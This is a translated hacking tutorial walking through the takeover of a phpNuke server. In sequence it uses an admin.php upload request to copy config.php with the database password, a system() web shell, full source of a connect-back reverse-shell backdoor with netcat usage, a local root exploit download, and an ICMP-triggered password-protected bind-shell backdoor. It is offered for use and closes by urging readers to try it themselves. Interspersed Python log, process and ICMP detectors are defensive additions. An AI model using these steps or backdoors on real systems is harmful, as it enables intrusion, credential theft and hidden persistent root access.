Learning to do bad things with phpNuke vulnerabilities
I searched Google for admin.php (search around a lot; this takes a long time). Ha~~ I spotted one: cshu.51.net/admin.php? (that name is made up, of course; who would work from their own nest, hehe~~~). Below it is the admin login page. In IE, paste:
cshu.51.net/admin.php?upload=1&file=config.php&file_name=cshu.txt&wdir=/images/&userfile=config.php&userfile_name=cshu.txt
Working over a modem is so slow! (While waiting, let me explain what the stuff above means: it copies phpNuke's configuration file to /images/cshu.txt!) See the filemanager page? That is the file upload page. But (here comes the most annoying part) sometimes error messages appear at the top of the page; that usually means /images/ is not writable. What then? Find a directory that is writable and change the wdir= part, for example wdir=/images/xxxxx/dddd or wdir=/../xxx/, and use ../../../../ to see every directory the nobody user can see. The directory you find must also be reachable through IE. Finding such a directory cost me 1.8 yuan (one hour). Once it works you will see a file cshu.txt in that directory; open cshu.51.net/xxx/images/cshu.txt and take a look. Excerpt:
$AllowableHTML = array("p"=>2, "b"=>1, "i"=>1, "a"=>2, "em"=>1, "br"=>1,
"strong"=>1, "blockquote"=>1, "tt"=>1, "li"=>1, "ol"=>1, "ul"=>1);
######################################################################
(1=Yes 0=No This will display a new box in Statistics page with relevant server info)
$Ephemerids = 0; $advancedstats = 0;
Of course it contains sensitive information such as the SQL password. But I won't use it (believe me?). Then~~~ upload phpshell.php or cmd.cgi, whichever the server supports. I uploaded cmd.php:
------------test1.php------------
<?php
echo "";
system("$cmd");   // $cmd arrives straight from the query string (register_globals)
echo "";
?>
------------test1.php------------
Learned this from san.
Enter cshu.51.net/xxx/images/cmd.php?cmd=id
See that?
uid=60001(nobody) gid=60001(nobody)
You can read passwd the same way, but who wants to crack it now.
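As an added example (not part of the original post), here is a small Python checker that a web administrator could run over Apache access logs to spot the two request patterns shown above: the admin.php upload call that copies config.php into the web root (with or without ../ in wdir), and a script sitting under an upload directory being driven through a cmd parameter. The log lines are constructed to mirror the URLs in the text; the log-format regex, the upload-directory list and the tag names are my own assumptions.

```python
import re
from os.path import basename
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines modelled on the requests in the text (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2001:10:01:02 +0100] "GET /admin.php?upload=1&file=config.php&file_name=cshu.txt&wdir=/images/&userfile=config.php&userfile_name=cshu.txt HTTP/1.0" 200 1532
10.0.0.5 - - [12/Mar/2001:10:05:44 +0100] "GET /admin.php?upload=1&file=config.php&file_name=cshu.txt&wdir=/../xxx/&userfile=config.php&userfile_name=cshu.txt HTTP/1.0" 200 1532
10.0.0.5 - - [12/Mar/2001:10:20:10 +0100] "GET /xxx/images/cmd.php?cmd=id HTTP/1.0" 200 61
10.0.0.5 - - [12/Mar/2001:10:25:00 +0100] "GET /xxx/images/cmd.php?cmd=cc%20-o%20back%20backdoor.c HTTP/1.0" 200 0
192.168.1.9 - - [12/Mar/2001:10:30:00 +0100] "GET /index.php HTTP/1.0" 200 8421
192.168.1.9 - - [12/Mar/2001:10:31:00 +0100] "GET /images/logo.gif HTTP/1.0" 200 2210
"""

# Apache common/combined log prefix: client, ident, user, [timestamp], "METHOD URL PROTO", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)
SENSITIVE_FILES = {"config.php"}   # phpNuke keeps the database password in here
UPLOAD_DIRS = ("/images/",)        # assumed upload locations: should hold data, never executable code
SCRIPT_EXT = (".php", ".cgi", ".pl")


def classify(line):
    """Return the list of finding tags for one log line ([] if nothing matched, None if unparsable)."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("url"))
    path = unquote(url.path)
    qs = parse_qs(url.query)       # parse_qs already percent-decodes the values
    tags = []
    # Pattern 1: the phpNuke admin.php file-manager upload handler being driven directly.
    if basename(path) == "admin.php" and qs.get("upload") == ["1"]:
        tags.append("phpnuke-admin-upload")
        sources = {basename(v) for k in ("userfile", "file") for v in qs.get(k, [])}
        if sources & SENSITIVE_FILES:
            tags.append("config-copied-to-webroot")
        if any(".." in v for v in qs.get("wdir", [])):
            tags.append("wdir-traversal")
    # Pattern 2: a script executing from an upload directory, possibly taking a command to run.
    if path.endswith(SCRIPT_EXT) and any(d in path for d in UPLOAD_DIRS):
        tags.append("script-under-upload-dir")
        if "cmd" in qs:
            tags.append("webshell-command:" + qs["cmd"][0])
    return tags


def scan(log_text):
    """Return (client ip, tags) for every suspicious line; benign and unparsable lines are dropped."""
    hits = []
    for line in log_text.splitlines():
        tags = classify(line)
        if tags:
            hits.append((LOG_RE.match(line).group("ip"), tags))
    return hits


if __name__ == "__main__":
    for ip, tags in scan(SAMPLE_LOG):
        print(ip, ", ".join(tags))
```

The two patterns are deliberately separate: the first one fires on the vulnerable handler regardless of what was uploaded, the second one fires on any script executing from a directory that should only hold images, which is also the condition a web server configuration (no script execution under upload directories) should make impossible in the first place.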
Let's upload a bindshell.
/*
**
** Digit-Labs Connect-Back Backdoor - digit-labs.org
** - (c) All rights reserved
**
** Use this backdoor to access machines behind
** firewalls.
**
** [step 1] -
** setup a listening port on your box e.g:
** >nc -l -p 4000
**
** [step 2] -
** Issue the following command:
** >./cbd
**
*/
int fd, sock;
int port = 4000; /* <-- can be changed */
struct sockaddr_in addr;
char mesg[] = "\n[ Digit-Labs Connect-Back Backdoor ]\n \
* Connected to Commandline...\n";
char shell[] = "/bin/sh";
int main(int argc, char *argv[]) {
while(argc < 2) {
fprintf(stderr, "\n %s \n\n", argv[0]);
exit(0);
}
addr.sin_family = AF_INET;
addr.sin_port = htons(port);
addr.sin_addr.s_addr = inet_addr(argv[1]);
fd = socket(AF_INET, SOCK_STREAM, 0);
connect(fd, (struct sockaddr*)&addr, sizeof(addr));
send(fd, mesg, sizeof(mesg), 0);
dup2(fd, 0);
dup2(fd, 1);
dup2(fd, 2);
execl(shell, "httpd.", 0); /* "httpd." <-- can be changed, so it is less likely to be noticed */
close(fd);
return 1;
}
Not bad, huh! And it gets through firewalls.
Upload backdoor.c
Open a window on my own machine:
c:\nc -l -vv -p 4000
cshu.51.net/xxx/images/cmd.php?cmd=cc -o back backdoor.c
cshu.51.net/xxx/images/cmd.php?cmd=./back xxx.xxx.xx.xx (my IP)
Now look at my window:
c:\nc -l -vv -p 4000
listening on [any] 4000 ...
connect to [*.*.*.*] from www.server.net [*.*.*.*] 2259
[ Digit-Labs Connect-Back Backdoor ]
* Connected to Commandline...
ls <----- familiar, right?
Don't forget you are still nobody!!!
w
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
Nobody logged in! (happy) Let's begin~~~
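What the session above leaves on the server is a /bin/sh whose argv[0] reads "httpd." and whose standard input and output are a TCP socket, running as nobody. As an added example (not from the original post), here is a Python process checker that looks for exactly those traits; it works from records of the kind /proc exposes and can build them on a live Linux host, but the records below are constructed, and the daemon-name list, the writable-directory list and the check names are my assumptions.

```python
import os

DAEMON_NAMES = {"httpd", "apache", "sshd", "crond", "syslogd", "init"}
SHELLS = {"sh", "bash", "dash", "ksh", "csh", "tcsh"}
# Places a web server process (or any local user) can write; a binary running from here is worth a look.
WRITABLE_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/", "/var/www/", "/home/httpd/")


def suspicious(proc):
    """Return the names of the checks a process record trips ([] means nothing noticed)."""
    argv0 = proc["cmdline"].split("\0")[0] if proc["cmdline"] else ""
    claimed = os.path.basename(argv0).rstrip(".")      # "httpd." -> "httpd"
    exe_name = os.path.basename(proc["exe"])
    fds = proc.get("fds", {})
    hits = []
    # Check 1: argv[0] names a system daemon but the file actually executing is something else.
    if claimed in DAEMON_NAMES and exe_name != claimed:
        hits.append("argv0-masquerade")
    # Check 2: the executable lives in a directory the web user or anyone else can write.
    if proc["exe"].startswith(WRITABLE_DIRS):
        hits.append("exe-in-writable-dir")
    # Check 3: a shell whose stdin/stdout/stderr are all a socket, the signature of dup2()-ing
    # a network connection onto fds 0-2 before exec'ing /bin/sh.
    if exe_name in SHELLS and all(fds.get(i, "").startswith("socket:") for i in (0, 1, 2)):
        hits.append("shell-stdio-on-socket")
    return hits


def scan(procs):
    """Map pid -> tripped checks for every record that trips at least one."""
    return {p["pid"]: suspicious(p) for p in procs if suspicious(p)}


def collect_linux():
    """Build the same records from /proc on a live Linux host (root needed to read other users' exe links)."""
    procs = []
    for pid in filter(str.isdigit, os.listdir("/proc")):
        base = f"/proc/{pid}"
        try:
            with open(f"{base}/cmdline", "rb") as f:
                cmdline = f.read().decode(errors="replace")
            exe = os.readlink(f"{base}/exe")
            uid = os.stat(base).st_uid
        except OSError:
            continue                      # process exited, kernel thread, or permission denied
        fds = {}
        for i in (0, 1, 2):
            try:
                fds[i] = os.readlink(f"{base}/fd/{i}")   # e.g. "socket:[41213]", "/dev/pts/0", "pipe:[555]"
            except OSError:
                pass
        procs.append({"pid": int(pid), "uid": uid, "cmdline": cmdline, "exe": exe, "fds": fds})
    return procs


# Constructed records in the shape collect_linux() produces (NUL-separated cmdline, as in /proc).
SAMPLE_PROCS = [
    # the connect-back shell: execl("/bin/sh", "httpd.", 0) as nobody, fds 0-2 dup2()'d onto the TCP socket
    {"pid": 2260, "uid": 60001, "cmdline": "httpd.", "exe": "/bin/sh",
     "fds": {0: "socket:[41213]", 1: "socket:[41213]", 2: "socket:[41213]"}},
    # a program running from the upload directory with one argument (constructed TEST-NET address)
    {"pid": 2258, "uid": 60001, "cmdline": "./back\x00192.0.2.10\x00", "exe": "/home/httpd/html/xxx/images/back",
     "fds": {0: "pipe:[555]", 1: "pipe:[556]", 2: "pipe:[556]"}},
    # a genuine web server worker
    {"pid": 501, "uid": 0, "cmdline": "/usr/sbin/httpd\x00", "exe": "/usr/sbin/httpd",
     "fds": {0: "/dev/null", 1: "/dev/null", 2: "/dev/null"}},
    # an ordinary interactive login shell on a pty
    {"pid": 1300, "uid": 500, "cmdline": "-bash\x00", "exe": "/bin/bash",
     "fds": {0: "/dev/pts/0", 1: "/dev/pts/0", 2: "/dev/pts/0"}},
    # sh -c spawned by a CGI/PHP system() call: stdio on pipes, so check 3 stays quiet
    {"pid": 2401, "uid": 60001, "cmdline": "sh\x00-c\x00id\x00", "exe": "/bin/sh",
     "fds": {0: "pipe:[555]", 1: "pipe:[556]", 2: "pipe:[556]"}},
]

if __name__ == "__main__":
    for pid, hits in scan(SAMPLE_PROCS).items():
        print(pid, ", ".join(hits))
```

The point of check 1 is that overwriting argv[0] only changes what ps and top display; /proc/PID/exe still points at the real file, so a name-versus-binary comparison catches any process that dresses itself up as a daemon, whichever name it picks.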
uname -a
Linux grasshopper.tellus.nl 2.2.17-21mdksecure #1 SMP Thu Oct 5 12:52:38 CEST 2000 i686 unknown
cd /usr/include/i586-mandrake-2.2.17/
Oh, it's Mandrake Linux.
Go to e4gle.org and find a local overflow exploit: http://e4gle.org/exploit/os/linux/mandrake/7.2/epcs2.c ;
Upload epcs2.c
cc -o x epcs2.c
./x
bug exploited successfully.
nenjoy
cd /root
ls
README_FIRST
admin
Let's install a backdoor; use the one lion wrote.
,have a goodluck.:) \r\n====================================\r\n\r\nyour command: \0"
void child_kill();
int bind_shell();
int main(int argc, char *argv[])
{
int s, size, fromlen;
char pkt[4096];
struct protoent *proto;
struct sockaddr_in from;
signal(SIGHUP,SIG_IGN);
signal(SIGCHLD, child_kill);
if (fork() != 0) exit(0);
proto = getprotobyname("icmp");
/* can't creat raw socket */
if ((s = socket(AF_INET, SOCK_RAW, proto->p_proto)) < 0)
exit(0);
/* waiting for packets */
while(1)
{
strcpy (argv[0], HIDEME);
do
{
fromlen = sizeof(from);
if ((size = recvfrom(s, pkt, sizeof(pkt), 0, (struct sockaddr *) &from, &fromlen)) < 0)
printf("", size-28);
} while (size != SIZEPACK + 28);
/* size == SIZEPACK, let's bind the shell on your port :)*/
switch(fork())
{
case -1:
continue;
case 0:
strcpy (argv[0], HIDEIDS);
bind_shell();
exit(0);
}
sleep(100);
}
}
void child_kill()
{
wait(NULL);
signal(SIGCHLD, child_kill);
}
int bind_shell()
{
int soc_des, soc_cli, soc_rc, soc_len, server_pid, cli_pid, i, time;
char passwd[15];
struct sockaddr_in serv_addr;
struct sockaddr_in client_addr;
setuid(0);
setgid(0);
seteuid(0);
setegid(0);
chdir("/");
soc_des = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (soc_des == -1)
exit(-1);
bzero((char *) &serv_addr,sizeof(serv_addr));
serv_addr.sin_family = AF_INET;
serv_addr.sin_addr.s_addr = htonl(INADDR_ANY);
serv_addr.sin_port = htons(PORT);
soc_rc = bind(soc_des, (struct sockaddr *) &serv_addr, sizeof(serv_addr));
if (soc_rc != 0)
exit(-1);
if (fork() != 0)
exit(0);
setpgrp();
if (fork() != 0)
exit(0);
soc_rc = listen(soc_des, 5);
if (soc_rc != 0)
exit(0);
while (1)
{
soc_len = sizeof(client_addr);
soc_cli = accept(soc_des, (struct sockaddr *) &client_addr, &soc_len);
if (soc_cli < 0)
exit(0);
cli_pid = getpid();
server_pid = fork();
if (server_pid != 0)
{
recv(soc_cli, passwd, sizeof(passwd), 0);
for (i = 0; i < strlen(passwd); i++)
{
if (passwd[i] == '\n' || passwd[i] == '\r')
{
passwd[i] = '\0';
}
}
if (strcmp(passwd, PASSWORD) != 0)
{
close(soc_cli);
return 0;
}
write(soc_cli,MESSAGE,strlen(MESSAGE));
for (i = 0; i < 3; i++)
{
dup2(soc_cli, i);
}
execl("/bin/sh","sh",(char *)0);
close(soc_cli);
return 1;
}
close(soc_cli);
}
return 0;
}
Try it~
cc -o 12 ping.c
./12
Back home:
ping -l 101 cshu.51.net
telnet cshu.51.net 10396
fuck&fuck <--- the password
====================================
You get it ,have a goodluck.:)
====================================
your command:ls;
README_FIRST
admin
Don't forget the ";", otherwise she won't obey.
On Linux use
ping -s 101 -c 4 cshu.51.net
Well, that's it.
Wipe your behind (clean up after yourself) and go do it on your own; there is lots of software like this.
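The trigger for the backdoor above is an ICMP echo whose raw-socket length equals SIZEPACK + 28 (20-byte IP header plus 8-byte ICMP header plus the data), which is why a ping with a 101-byte payload opens port 10396 and a telnet follows a few seconds later. As an added example (not from the original post), here is a Python correlation rule over constructed sniffer/firewall events: it records echo requests whose data length is not a stock ping default and alerts when the same source then connects to a port the host is not known to serve. The event format, the known-port list and the time window are my assumptions.

```python
# Data-field sizes that stock ping clients send by default (Linux/BSD ping: 56 bytes,
# Windows ping: 32 bytes); anything else deserves a second look.
DEFAULT_ECHO_DATA = {56, 32}
KNOWN_LISTENING = {22, 80, 443}     # assumed: the ports this host is supposed to serve
WINDOW = 120                        # seconds allowed between the odd echo and the follow-up connection

IP_HDR, ICMP_HDR = 20, 8


def raw_socket_len(data_len):
    """Bytes recvfrom() returns on a raw ICMP socket for an echo carrying data_len payload bytes:
    the IP and ICMP headers come back with the data, so a listener that waits for SIZEPACK + 28
    bytes is matched by 'ping -s SIZEPACK' (Linux) or 'ping -l SIZEPACK' (Windows)."""
    return IP_HDR + ICMP_HDR + data_len


# Constructed events (what a sniffer or firewall log would yield), timestamps in seconds.
SAMPLE_EVENTS = [
    {"ts": 1000, "kind": "icmp", "src": "203.0.113.7", "dst": "10.0.0.2", "type": 8, "data_len": 101},
    {"ts": 1001, "kind": "icmp", "src": "203.0.113.7", "dst": "10.0.0.2", "type": 8, "data_len": 101},
    {"ts": 1002, "kind": "icmp", "src": "203.0.113.7", "dst": "10.0.0.2", "type": 8, "data_len": 101},
    {"ts": 1003, "kind": "icmp", "src": "203.0.113.7", "dst": "10.0.0.2", "type": 8, "data_len": 101},
    {"ts": 1040, "kind": "tcp_syn", "src": "203.0.113.7", "dst": "10.0.0.2", "dport": 10396},
    {"ts": 1500, "kind": "icmp", "src": "198.51.100.4", "dst": "10.0.0.2", "type": 8, "data_len": 56},
    {"ts": 1510, "kind": "tcp_syn", "src": "198.51.100.4", "dst": "10.0.0.2", "dport": 80},
    # a connection to the same high port with no preceding echo: a scan, not a trigger sequence
    {"ts": 2000, "kind": "tcp_syn", "src": "192.0.2.9", "dst": "10.0.0.2", "dport": 10396},
]


def is_odd_echo(e):
    return e["kind"] == "icmp" and e["type"] == 8 and e["data_len"] not in DEFAULT_ECHO_DATA


def odd_echo_sizes(events):
    """Per source: the set of non-default echo data lengths it sent (one fixed odd size, repeated, is the tell)."""
    sizes = {}
    for e in events:
        if is_odd_echo(e):
            sizes.setdefault(e["src"], set()).add(e["data_len"])
    return sizes


def correlate(events, window=WINDOW):
    """Alert when a source that just sent odd-sized echoes connects, within `window` seconds, to a
    port the host does not normally serve: the 'ping, then telnet to the new port' sequence."""
    last_odd = {}        # (src, dst) -> (ts, data_len) of the most recent odd echo
    alerts = []
    for e in sorted(events, key=lambda ev: ev["ts"]):
        key = (e["src"], e["dst"])
        if is_odd_echo(e):
            last_odd[key] = (e["ts"], e["data_len"])
        elif e["kind"] == "tcp_syn" and e["dport"] not in KNOWN_LISTENING and key in last_odd:
            t0, size = last_odd[key]
            if e["ts"] - t0 <= window:
                alerts.append({"src": e["src"], "dst": e["dst"], "port": e["dport"],
                               "trigger_data_len": size, "delay": e["ts"] - t0})
    return alerts


if __name__ == "__main__":
    for a in correlate(SAMPLE_EVENTS):
        print(a)
```

On the host itself the complementary check is simpler: a raw ICMP socket can only be opened by root, so any root process holding one that is not a ping or routing daemon is worth explaining, and a port that is closed one minute and accepting connections the next without a corresponding service start is the other half of the same story.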
- Article author: 福州军威计算机技术有限公司
Copyright notice: original work; reposting is permitted provided the original source, the author information and this notice are given in the form of a hyperlink. Otherwise legal action will be pursued.